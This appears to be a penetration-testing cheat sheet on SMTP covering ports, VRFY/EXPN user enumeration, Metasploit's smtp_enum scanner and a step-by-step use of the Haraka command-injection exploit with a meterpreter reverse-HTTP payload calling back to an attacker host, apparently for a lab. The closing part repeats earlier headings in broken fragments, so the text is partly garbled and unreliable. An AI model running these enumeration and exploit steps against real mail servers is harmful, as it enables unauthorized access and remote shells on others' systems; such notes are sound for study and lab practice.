#SMTP (Simple Mail Transfer Protocol) [ Port: 25 or 465 or 587]

SMTP: is a communication protocol that is used for the transmission of email.

SMTP uses TCP port 25 by default. It is can also be configured to run on TCP port 465 and 587.

We can utilize auxiliary modules to enumerate the version of SMTP as well as user accounts on the target system.

search type:auxiliary name:smtp

Search AUX modules.

To connect to a SMTP server we use netcat: `nc <ip> <port>`

The SMTP service has two internal commands that allow the enumeration of users:
VRFY: (confirming the names of valid users)
EXPN: (which reveals the actual address of users aliases and lists of e-mail (mailing lists))

Haraka SMTP server:

is an Open-Source high performance SMTP server developed in Node.js. The Haraka SMTP server comes with a plugin for processing attachments. Haraka versions prior to V2.8.9 are vulnerable to command injection.

MSF Module:

exploit/linux/smtp/haraka

Then

set rhost <target_ip>

Then

set SRVPORT 9898

Then

set email_to root@attackdefense.test

Then set a staged payload:

set payload linux/x64/meterpreter_reverse_http

set LHOST

set LHOST <attacking_IP>

MSF Modules:

This module is very useful for collecting existing usernames on the target:

auxiliary/scanner/smtp/smtp_enum

set UNIXONLY false If you are not working on a Linux target....
Also select a proper USER_FILE based on the target.

** #SMTP (Simple Mail Transfer Protocol)** [ Port: 25 or 465 or 587]

SMTP: is a communication protocol that is used for the transmission of email.

To connect to a SMTP server we use netcat: nc <ip> <port>

Haraka SMTP server:

MSF Module:

MSF Modules:

#SMTP (Simple Mail Transfer Protocol) [ Port: 25 or 465 or 587]

To connect to a SMTP server we use netcat: `nc <ip> <port>`